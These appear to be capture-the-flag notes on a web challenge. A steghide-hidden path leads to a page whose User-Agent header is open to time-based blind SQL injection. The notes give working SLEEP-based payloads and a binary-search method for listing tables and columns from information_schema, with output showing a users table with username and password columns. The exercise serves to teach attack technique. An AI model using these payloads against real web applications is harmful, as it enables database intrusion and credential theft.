HTML comment with "Bran2018" password
Title says "steghide warmup"
steghide extract hacker_SRI.jpg using password
=> "/you_start_here.php"

password admini

password, username not injectable

useragent injectable
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)' RLIKE SLEEP(5) AND 'AQHM'='AQHM

sleeps

Simpler PoC:

' LIKE % AND 'X'='X


' LIKE SLEEP(IF(<condition>, 1, 0)) AND 'X'='X

has response times of ~1s if the condition is true and ~0s otherwise

(select count(*) from information_schema.TABLES)

binary search number of tables:

SLEEP(IF((select count(*) from information_schema.TABLES where ENGINE="InnoDB")>10,1,0)

get the n-th table name
SELECT TABLE_NAME from information_schema.TABLES where ENGINE="InnoDB" LIMIT {n},1

.....

DB name: injection
Binary search to get the number of InnoDB tables...
2 tablesnn
users
visits
Table users - getting columns...
ID
USERNAME
PASSWORD
CREATED_AT
_
['ID', 'USERNAME', 'PASSWORD', 'CREATED_AT', '']
Table visits - getting columns...
UA
CREATED_AT
_
['UA', 'CREATED_AT', '']

...

